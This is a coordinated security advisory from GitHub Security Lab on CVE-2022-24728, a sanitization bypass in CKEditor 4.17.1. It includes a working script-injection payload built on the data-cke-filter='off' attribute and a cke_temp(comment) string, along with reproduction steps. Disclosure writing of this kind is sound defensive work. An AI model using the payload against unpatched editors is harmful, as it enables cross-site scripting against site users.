GHSL-2022-009: HTML content sanitization bypass allowing to execute JavaScript code in CKEditor 4 - CVE-2022-24728

Coordinated Disclosure Timeline

• 2022-01-28: Sent report to security@cksource.com
• 2022-01-31: Reply from security@cksource.com, acknowledging the issue. They plan to fix it in version 4.17.3.
• 2022-03-01: GitHub Security Advisory created.
• 2022-03-08: Fixed
• 2022-03-16: Version 4.18.0 released.

Summary

The HTML content sanitization in ckeditor4 can be bypassed, enabling Javascript code to be executed (in the browser). Note: this vulnerability is very similar to CVE-2021-41165, and uses the same attack vector.

Product

ckeditor4

Tested Version

4.17.1

Details

Issue: Content sanitization bypass (GHSL-2022-009)

ckeditor4 has a “Source” button, which allows the user to toggle between wysiwyg editing and a raw HTML editing mode. When the user toggles back to wysiwyg mode after editing the raw HTML, ckeditor4 tries to sanitize the HTML to prevent the user from inserting any executable Javascript into the webpage. The sanitization logic has recently been improved to fix previous vulnerabilities such as CVE-2021-41165, but it is still possible to bypass it. I was able to bypass the sanitization by entering the following HTML:

<p data-cke-filter="off"><script>alert();cke_temp(comment)</script></p>

There are two parts to this bypass:

First, the inclusion of string “cke_temp(comment)” is designed to trigger this regex:

// Avoid protecting over protected, e.g. /\{.*?\}/
return ( /cke_temp(comment)?/ ).test( match ) ? match : '<!--{cke_temp}' + ( protectedHtml.push( match ) - 1 ) + '-->';

That prevents ckeditor4 from wrapping the script element in a {cke_protected} comment.

Second, the data-cke-filter attribute triggers an early return here:

// Do not filter element with data-cke-filter="off" and all their descendants.
if ( el.attributes[ 'data-cke-filter' ] == 'off' )
    return false;

Full reproduction steps

git clone https://github.com/ckeditor/ckeditor4.git
cd ckeditor4
git checkout 4.17.1

Open ckeditor4/samples/index.html in a browser.

Click the “Source” button.

Replace the raw HTML with this:

<p data-cke-filter="off"><script>alert();cke_temp(comment)</script></p>

Click the “Source” button.

You should see an alert popup.

Impact

This issue could enable an attacker to bypass the sanitization logic and inject Javascript code.

CVE

• CVE-2022-24728

Credit

This issue was discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse). Also, many thanks to @wbowling (William Bowling) for helping us with additional technical details about CVE-2021-41165.

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-009 in any communication regarding this issue.